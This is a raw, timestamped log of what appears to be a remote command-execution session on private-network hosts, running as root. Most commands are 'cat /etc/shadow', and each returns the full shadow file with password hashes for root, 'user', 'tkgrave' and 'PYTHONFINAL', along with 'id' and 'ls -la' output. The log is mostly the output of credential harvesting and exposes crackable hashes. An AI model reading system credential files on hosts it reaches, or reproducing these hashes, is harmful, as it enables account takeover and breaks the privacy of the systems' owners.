20170925151542: <- id
20170925151542: -> uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
20170925151547: <- cat /etc/shadow
20170925151547: -> root:$6$96VemkOy$tIaL5u.zT6y5qEG5AOtV5U8QZWAwaTozwWZfetZwXXZzuZ8h/QzxCcEOOUBRIEHhLHKfwoyezqw6vEJAxyZUQ/:17434:0:99999:7:::
bin:*:17110:0:99999:7:::
daemon:*:17110:0:99999:7:::
adm:*:17110:0:99999:7:::
lp:*:17110:0:99999:7:::
sync:*:17110:0:99999:7:::
shutdown:*:17110:0:99999:7:::
halt:*:17110:0:99999:7:::
mail:*:17110:0:99999:7:::
operator:*:17110:0:99999:7:::
games:*:17110:0:99999:7:::
ftp:*:17110:0:99999:7:::
nobody:*:17110:0:99999:7:::
systemd-bus-proxy:!!:17191::::::
systemd-network:!!:17191::::::
dbus:!!:17191::::::
polkitd:!!:17191::::::
abrt:!!:17191::::::
unbound:!!:17191::::::
usbmuxd:!!:17191::::::
tss:!!:17191::::::
libstoragemgmt:!!:17191::::::
rpc:!!:17191:0:99999:7:::
colord:!!:17191::::::
saslauth:!!:17191::::::
geoclue:!!:17191::::::
setroubleshoot:!!:17191::::::
rtkit:!!:17191::::::
qemu:!!:17191::::::
radvd:!!:17191::::::
chrony:!!:17191::::::
ntp:!!:17191::::::
sssd:!!:17191::::::
rpcuser:!!:17191::::::
nfsnobody:!!:17191::::::
pulse:!!:17191::::::
gdm:!!:17191::::::
gnome-initial-setup:!!:17191::::::
avahi:!!:17191::::::
postfix:!!:17191::::::
sshd:!!:17191::::::
tcpdump:!!:17191::::::
user:$6$E3SvpfUZ$i93nfYpWLdD.o3pOkkMjIHeLkPf8qKp39jp86aHOp52AnQQobfvdd3tscepF7.Kx6tqGh3iDYWh6q1yB2y3Kh/:17434:0:99999:7:::
tkgrave:22Xi9z9ezuOU6:17430:0:99999:7:::
fileio:!!:17431:0:99999:7:::
20170925151603: <- id
20170925151603: -> uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
20170925151605: <- ls -la
20170925151605: -> total 21
drwxrwxrwx. 2 root root 8192 Sep 25 15:15 .
drwxrwxrwx. 2 root root 4096 Sep 25 14:03 ..
-rwxrwxrwx. 1 root root   56 Sep 21 07:21 remoteHosts.txt
-rwxrwxrwx. 1 root root 2070 Sep 25 11:46 threadedServer.py
-rwxrwxrwx. 1 root root 1403 Sep 25 15:15 threadlog-172.16.28.230.txt
-rwxrwxrwx. 1 root root    0 Sep 25 15:15 threadlog-172.16.28.231.txt
-rwxrwxrwx. 1 root root  209 Sep 25 15:11 threadlog-172.16.28.232.txt
20170925151616: <- cat /etc/shadow
20170925151616: -> root:$6$96VemkOy$tIaL5u.zT6y5qEG5AOtV5U8QZWAwaTozwWZfetZwXXZzuZ8h/QzxCcEOOUBRIEHhLHKfwoyezqw6vEJAxyZUQ/:17434:0:99999:7:::
bin:*:17110:0:99999:7:::
daemon:*:17110:0:99999:7:::
adm:*:17110:0:99999:7:::
lp:*:17110:0:99999:7:::
sync:*:17110:0:99999:7:::
shutdown:*:17110:0:99999:7:::
halt:*:17110:0:99999:7:::
mail:*:17110:0:99999:7:::
operator:*:17110:0:99999:7:::
games:*:17110:0:99999:7:::
ftp:*:17110:0:99999:7:::
nobody:*:17110:0:99999:7:::
systemd-bus-proxy:!!:17191::::::
systemd-network:!!:17191::::::
dbus:!!:17191::::::
polkitd:!!:17191::::::
abrt:!!:17191::::::
unbound:!!:17191::::::
usbmuxd:!!:17191::::::
tss:!!:17191::::::
libstoragemgmt:!!:17191::::::
rpc:!!:17191:0:99999:7:::
colord:!!:17191::::::
saslauth:!!:17191::::::
geoclue:!!:17191::::::
setroubleshoot:!!:17191::::::
rtkit:!!:17191::::::
qemu:!!:17191::::::
radvd:!!:17191::::::
chrony:!!:17191::::::
ntp:!!:17191::::::
sssd:!!:17191::::::
rpcuser:!!:17191::::::
nfsnobody:!!:17191::::::
pulse:!!:17191::::::
gdm:!!:17191::::::
gnome-initial-setup:!!:17191::::::
avahi:!!:17191::::::
postfix:!!:17191::::::
sshd:!!:17191::::::
tcpdump:!!:17191::::::
user:$6$E3SvpfUZ$i93nfYpWLdD.o3pOkkMjIHeLkPf8qKp39jp86aHOp52AnQQobfvdd3tscepF7.Kx6tqGh3iDYWh6q1yB2y3Kh/:17434:0:99999:7:::
tkgrave:22Xi9z9ezuOU6:17430:0:99999:7:::
fileio:!!:17431:0:99999:7:::
20170925151618: <- ls -la
20170925151618: -> total 21
drwxrwxrwx. 2 root root 8192 Sep 25 15:15 .
drwxrwxrwx. 2 root root 4096 Sep 25 14:03 ..
-rwxrwxrwx. 1 root root   56 Sep 21 07:21 remoteHosts.txt
-rwxrwxrwx. 1 root root 2070 Sep 25 11:46 threadedServer.py
-rwxrwxrwx. 1 root root 1403 Sep 25 15:15 threadlog-172.16.28.230.txt
-rwxrwxrwx. 1 root root    0 Sep 25 15:15 threadlog-172.16.28.231.txt
-rwxrwxrwx. 1 root root  448 Sep 25 15:11 threadlog-172.16.28.232.txt
20170925151650: Closing connection20170925151718: <- cat /etc/shadow
20170925151718: -> root:$6$96VemkOy$tIaL5u.zT6y5qEG5AOtV5U8QZWAwaTozwWZfetZwXXZzuZ8h/QzxCcEOOUBRIEHhLHKfwoyezqw6vEJAxyZUQ/:17434:0:99999:7:::
bin:*:17110:0:99999:7:::
daemon:*:17110:0:99999:7:::
adm:*:17110:0:99999:7:::
lp:*:17110:0:99999:7:::
sync:*:17110:0:99999:7:::
shutdown:*:17110:0:99999:7:::
halt:*:17110:0:99999:7:::
mail:*:17110:0:99999:7:::
operator:*:17110:0:99999:7:::
games:*:17110:0:99999:7:::
ftp:*:17110:0:99999:7:::
nobody:*:17110:0:99999:7:::
systemd-bus-proxy:!!:17191::::::
systemd-network:!!:17191::::::
dbus:!!:17191::::::
polkitd:!!:17191::::::
abrt:!!:17191::::::
unbound:!!:17191::::::
usbmuxd:!!:17191::::::
tss:!!:17191::::::
libstoragemgmt:!!:17191::::::
rpc:!!:17191:0:99999:7:::
colord:!!:17191::::::
saslauth:!!:17191::::::
geoclue:!!:17191::::::
setroubleshoot:!!:17191::::::
rtkit:!!:17191::::::
qemu:!!:17191::::::
radvd:!!:17191::::::
chrony:!!:17191::::::
ntp:!!:17191::::::
sssd:!!:17191::::::
rpcuser:!!:17191::::::
nfsnobody:!!:17191::::::
pulse:!!:17191::::::
gdm:!!:17191::::::
gnome-initial-setup:!!:17191::::::
avahi:!!:17191::::::
postfix:!!:17191::::::
sshd:!!:17191::::::
tcpdump:!!:17191::::::
user:$6$E3SvpfUZ$i93nfYpWLdD.o3pOkkMjIHeLkPf8qKp39jp86aHOp52AnQQobfvdd3tscepF7.Kx6tqGh3iDYWh6q1yB2y3Kh/:17434:0:99999:7:::
tkgrave:22Xi9z9ezuOU6:17430:0:99999:7:::
fileio:!!:17431:0:99999:7:::
20170925151729: Closing connection20170925151856: <- cat /etc/shadow
20170925151856: -> root:$6$96VemkOy$tIaL5u.zT6y5qEG5AOtV5U8QZWAwaTozwWZfetZwXXZzuZ8h/QzxCcEOOUBRIEHhLHKfwoyezqw6vEJAxyZUQ/:17434:0:99999:7:::
bin:*:17110:0:99999:7:::
daemon:*:17110:0:99999:7:::
adm:*:17110:0:99999:7:::
lp:*:17110:0:99999:7:::
sync:*:17110:0:99999:7:::
shutdown:*:17110:0:99999:7:::
halt:*:17110:0:99999:7:::
mail:*:17110:0:99999:7:::
operator:*:17110:0:99999:7:::
games:*:17110:0:99999:7:::
ftp:*:17110:0:99999:7:::
nobody:*:17110:0:99999:7:::
systemd-bus-proxy:!!:17191::::::
systemd-network:!!:17191::::::
dbus:!!:17191::::::
polkitd:!!:17191::::::
abrt:!!:17191::::::
unbound:!!:17191::::::
usbmuxd:!!:17191::::::
tss:!!:17191::::::
libstoragemgmt:!!:17191::::::
rpc:!!:17191:0:99999:7:::
colord:!!:17191::::::
saslauth:!!:17191::::::
geoclue:!!:17191::::::
setroubleshoot:!!:17191::::::
rtkit:!!:17191::::::
qemu:!!:17191::::::
radvd:!!:17191::::::
chrony:!!:17191::::::
ntp:!!:17191::::::
sssd:!!:17191::::::
rpcuser:!!:17191::::::
nfsnobody:!!:17191::::::
pulse:!!:17191::::::
gdm:!!:17191::::::
gnome-initial-setup:!!:17191::::::
avahi:!!:17191::::::
postfix:!!:17191::::::
sshd:!!:17191::::::
tcpdump:!!:17191::::::
user:$6$E3SvpfUZ$i93nfYpWLdD.o3pOkkMjIHeLkPf8qKp39jp86aHOp52AnQQobfvdd3tscepF7.Kx6tqGh3iDYWh6q1yB2y3Kh/:17434:0:99999:7:::
tkgrave:22Xi9z9ezuOU6:17430:0:99999:7:::
fileio:!!:17431:0:99999:7:::
PYTHONFINAL:$6$I2g9tpav$z/OGMRBKWHXjDrvYFsna1HLw2ribVxu09nLwseYKXu6ZgM8r9qddKkq2hHtyCoOLtS/1sSxaXeO1svg0Rg.46.:17434:0:99999:7:::
20170925151907: Closing connection20170925152428: <- cat /etc/shadow20170925152428: -> root:$6$96VemkOy$tIaL5u.zT6y5qEG5AOtV5U8QZWAwaTozwWZfetZwXXZzuZ8h/QzxCcEOOUBRIEHhLHKfwoyezqw6vEJAxyZUQ/:17434:0:99999:7:::
bin:*:17110:0:99999:7:::
daemon:*:17110:0:99999:7:::
adm:*:17110:0:99999:7:::
lp:*:17110:0:99999:7:::
sync:*:17110:0:99999:7:::
shutdown:*:17110:0:99999:7:::
halt:*:17110:0:99999:7:::
mail:*:17110:0:99999:7:::
operator:*:17110:0:99999:7:::
games:*:17110:0:99999:7:::
ftp:*:17110:0:99999:7:::
nobody:*:17110:0:99999:7:::
systemd-bus-proxy:!!:17191::::::
systemd-network:!!:17191::::::
dbus:!!:17191::::::
polkitd:!!:17191::::::
abrt:!!:17191::::::
unbound:!!:17191::::::
usbmuxd:!!:17191::::::
tss:!!:17191::::::
libstoragemgmt:!!:17191::::::
rpc:!!:17191:0:99999:7:::
colord:!!:17191::::::
saslauth:!!:17191::::::
geoclue:!!:17191::::::
setroubleshoot:!!:17191::::::
rtkit:!!:17191::::::
qemu:!!:17191::::::
radvd:!!:17191::::::
chrony:!!:17191::::::
ntp:!!:17191::::::
sssd:!!:17191::::::
rpcuser:!!:17191::::::
nfsnobody:!!:17191::::::
pulse:!!:17191::::::
gdm:!!:17191::::::
gnome-initial-setup:!!:17191::::::
avahi:!!:17191::::::
postfix:!!:17191::::::
sshd:!!:17191::::::
tcpdump:!!:17191::::::
user:$6$E3SvpfUZ$i93nfYpWLdD.o3pOkkMjIHeLkPf8qKp39jp86aHOp52AnQQobfvdd3tscepF7.Kx6tqGh3iDYWh6q1yB2y3Kh/:17434:0:99999:7:::
tkgrave:22Xi9z9ezuOU6:17430:0:99999:7:::
fileio:!!:17431:0:99999:7:::
PYTHONFINAL:$6$I2g9tpav$z/OGMRBKWHXjDrvYFsna1HLw2ribVxu09nLwseYKXu6ZgM8r9qddKkq2hHtyCoOLtS/1sSxaXeO1svg0Rg.46.:17434:0:99999:7:::
20170925152440: Closing connection20170925152452: <- cat /etc/shadow20170925152452: -> root:$6$96VemkOy$tIaL5u.zT6y5qEG5AOtV5U8QZWAwaTozwWZfetZwXXZzuZ8h/QzxCcEOOUBRIEHhLHKfwoyezqw6vEJAxyZUQ/:17434:0:99999:7:::
bin:*:17110:0:99999:7:::
daemon:*:17110:0:99999:7:::
adm:*:17110:0:99999:7:::
lp:*:17110:0:99999:7:::
sync:*:17110:0:99999:7:::
shutdown:*:17110:0:99999:7:::
halt:*:17110:0:99999:7:::
mail:*:17110:0:99999:7:::
operator:*:17110:0:99999:7:::
games:*:17110:0:99999:7:::
ftp:*:17110:0:99999:7:::
nobody:*:17110:0:99999:7:::
systemd-bus-proxy:!!:17191::::::
systemd-network:!!:17191::::::
dbus:!!:17191::::::
polkitd:!!:17191::::::
abrt:!!:17191::::::
unbound:!!:17191::::::
usbmuxd:!!:17191::::::
tss:!!:17191::::::
libstoragemgmt:!!:17191::::::
rpc:!!:17191:0:99999:7:::
colord:!!:17191::::::
saslauth:!!:17191::::::
geoclue:!!:17191::::::
setroubleshoot:!!:17191::::::
rtkit:!!:17191::::::
qemu:!!:17191::::::
radvd:!!:17191::::::
chrony:!!:17191::::::
ntp:!!:17191::::::
sssd:!!:17191::::::
rpcuser:!!:17191::::::
nfsnobody:!!:17191::::::
pulse:!!:17191::::::
gdm:!!:17191::::::
gnome-initial-setup:!!:17191::::::
avahi:!!:17191::::::
postfix:!!:17191::::::
sshd:!!:17191::::::
tcpdump:!!:17191::::::
user:$6$E3SvpfUZ$i93nfYpWLdD.o3pOkkMjIHeLkPf8qKp39jp86aHOp52AnQQobfvdd3tscepF7.Kx6tqGh3iDYWh6q1yB2y3Kh/:17434:0:99999:7:::
tkgrave:22Xi9z9ezuOU6:17430:0:99999:7:::
fileio:!!:17431:0:99999:7:::
PYTHONFINAL:$6$I2g9tpav$z/OGMRBKWHXjDrvYFsna1HLw2ribVxu09nLwseYKXu6ZgM8r9qddKkq2hHtyCoOLtS/1sSxaXeO1svg0Rg.46.:17434:0:99999:7:::
20170925152505: Closing connection20170925152523: <- cat /etc/shadow20170925152523: -> root:$6$96VemkOy$tIaL5u.zT6y5qEG5AOtV5U8QZWAwaTozwWZfetZwXXZzuZ8h/QzxCcEOOUBRIEHhLHKfwoyezqw6vEJAxyZUQ/:17434:0:99999:7:::
bin:*:17110:0:99999:7:::
daemon:*:17110:0:99999:7:::
adm:*:17110:0:99999:7:::
lp:*:17110:0:99999:7:::
sync:*:17110:0:99999:7:::
shutdown:*:17110:0:99999:7:::
halt:*:17110:0:99999:7:::
mail:*:17110:0:99999:7:::
operator:*:17110:0:99999:7:::
games:*:17110:0:99999:7:::
ftp:*:17110:0:99999:7:::
nobody:*:17110:0:99999:7:::
systemd-bus-proxy:!!:17191::::::
systemd-network:!!:17191::::::
dbus:!!:17191::::::
polkitd:!!:17191::::::
abrt:!!:17191::::::
unbound:!!:17191::::::
usbmuxd:!!:17191::::::
tss:!!:17191::::::
libstoragemgmt:!!:17191::::::
rpc:!!:17191:0:99999:7:::
colord:!!:17191::::::
saslauth:!!:17191::::::
geoclue:!!:17191::::::
setroubleshoot:!!:17191::::::
rtkit:!!:17191::::::
qemu:!!:17191::::::
radvd:!!:17191::::::
chrony:!!:17191::::::
ntp:!!:17191::::::
sssd:!!:17191::::::
rpcuser:!!:17191::::::
nfsnobody:!!:17191::::::
pulse:!!:17191::::::
gdm:!!:17191::::::
gnome-initial-setup:!!:17191::::::
avahi:!!:17191::::::
postfix:!!:17191::::::
sshd:!!:17191::::::
tcpdump:!!:17191::::::
user:$6$E3SvpfUZ$i93nfYpWLdD.o3pOkkMjIHeLkPf8qKp39jp86aHOp52AnQQobfvdd3tscepF7.Kx6tqGh3iDYWh6q1yB2y3Kh/:17434:0:99999:7:::
tkgrave:22Xi9z9ezuOU6:17430:0:99999:7:::
fileio:!!:17431:0:99999:7:::
PYTHONFINAL:$6$I2g9tpav$z/OGMRBKWHXjDrvYFsna1HLw2ribVxu09nLwseYKXu6ZgM8r9qddKkq2hHtyCoOLtS/1sSxaXeO1svg0Rg.46.:17434:0:99999:7:::
20170925152528: Closing connection20170925152557: <- cat /etc/shadow20170925152557: -> root:$6$96VemkOy$tIaL5u.zT6y5qEG5AOtV5U8QZWAwaTozwWZfetZwXXZzuZ8h/QzxCcEOOUBRIEHhLHKfwoyezqw6vEJAxyZUQ/:17434:0:99999:7:::
bin:*:17110:0:99999:7:::
daemon:*:17110:0:99999:7:::
adm:*:17110:0:99999:7:::
lp:*:17110:0:99999:7:::
sync:*:17110:0:99999:7:::
shutdown:*:17110:0:99999:7:::
halt:*:17110:0:99999:7:::
mail:*:17110:0:99999:7:::
operator:*:17110:0:99999:7:::
games:*:17110:0:99999:7:::
ftp:*:17110:0:99999:7:::
nobody:*:17110:0:99999:7:::
systemd-bus-proxy:!!:17191::::::
systemd-network:!!:17191::::::
dbus:!!:17191::::::
polkitd:!!:17191::::::
abrt:!!:17191::::::
unbound:!!:17191::::::
usbmuxd:!!:17191::::::
tss:!!:17191::::::
libstoragemgmt:!!:17191::::::
rpc:!!:17191:0:99999:7:::
colord:!!:17191::::::
saslauth:!!:17191::::::
geoclue:!!:17191::::::
setroubleshoot:!!:17191::::::
rtkit:!!:17191::::::
qemu:!!:17191::::::
radvd:!!:17191::::::
chrony:!!:17191::::::
ntp:!!:17191::::::
sssd:!!:17191::::::
rpcuser:!!:17191::::::
nfsnobody:!!:17191::::::
pulse:!!:17191::::::
gdm:!!:17191::::::
gnome-initial-setup:!!:17191::::::
avahi:!!:17191::::::
postfix:!!:17191::::::
sshd:!!:17191::::::
tcpdump:!!:17191::::::
user:$6$E3SvpfUZ$i93nfYpWLdD.o3pOkkMjIHeLkPf8qKp39jp86aHOp52AnQQobfvdd3tscepF7.Kx6tqGh3iDYWh6q1yB2y3Kh/:17434:0:99999:7:::
tkgrave:22Xi9z9ezuOU6:17430:0:99999:7:::
fileio:!!:17431:0:99999:7:::
PYTHONFINAL:$6$I2g9tpav$z/OGMRBKWHXjDrvYFsna1HLw2ribVxu09nLwseYKXu6ZgM8r9qddKkq2hHtyCoOLtS/1sSxaXeO1svg0Rg.46.:17434:0:99999:7:::
20170925152744: <- cat /etc/shadow20170925152744: -> root:$6$96VemkOy$tIaL5u.zT6y5qEG5AOtV5U8QZWAwaTozwWZfetZwXXZzuZ8h/QzxCcEOOUBRIEHhLHKfwoyezqw6vEJAxyZUQ/:17434:0:99999:7:::
bin:*:17110:0:99999:7:::
daemon:*:17110:0:99999:7:::
adm:*:17110:0:99999:7:::
lp:*:17110:0:99999:7:::
sync:*:17110:0:99999:7:::
shutdown:*:17110:0:99999:7:::
halt:*:17110:0:99999:7:::
mail:*:17110:0:99999:7:::
operator:*:17110:0:99999:7:::
games:*:17110:0:99999:7:::
ftp:*:17110:0:99999:7:::
nobody:*:17110:0:99999:7:::
systemd-bus-proxy:!!:17191::::::
systemd-network:!!:17191::::::
dbus:!!:17191::::::
polkitd:!!:17191::::::
abrt:!!:17191::::::
unbound:!!:17191::::::
usbmuxd:!!:17191::::::
tss:!!:17191::::::
libstoragemgmt:!!:17191::::::
rpc:!!:17191:0:99999:7:::
colord:!!:17191::::::
saslauth:!!:17191::::::
geoclue:!!:17191::::::
setroubleshoot:!!:17191::::::
rtkit:!!:17191::::::
qemu:!!:17191::::::
radvd:!!:17191::::::
chrony:!!:17191::::::
ntp:!!:17191::::::
sssd:!!:17191::::::
rpcuser:!!:17191::::::
nfsnobody:!!:17191::::::
pulse:!!:17191::::::
gdm:!!:17191::::::
gnome-initial-setup:!!:17191::::::
avahi:!!:17191::::::
postfix:!!:17191::::::
sshd:!!:17191::::::
tcpdump:!!:17191::::::
user:$6$E3SvpfUZ$i93nfYpWLdD.o3pOkkMjIHeLkPf8qKp39jp86aHOp52AnQQobfvdd3tscepF7.Kx6tqGh3iDYWh6q1yB2y3Kh/:17434:0:99999:7:::
tkgrave:22Xi9z9ezuOU6:17430:0:99999:7:::
fileio:!!:17431:0:99999:7:::
PYTHONFINAL:$6$I2g9tpav$z/OGMRBKWHXjDrvYFsna1HLw2ribVxu09nLwseYKXu6ZgM8r9qddKkq2hHtyCoOLtS/1sSxaXeO1svg0Rg.46.:17434:0:99999:7:::
20170925152744: Closing connection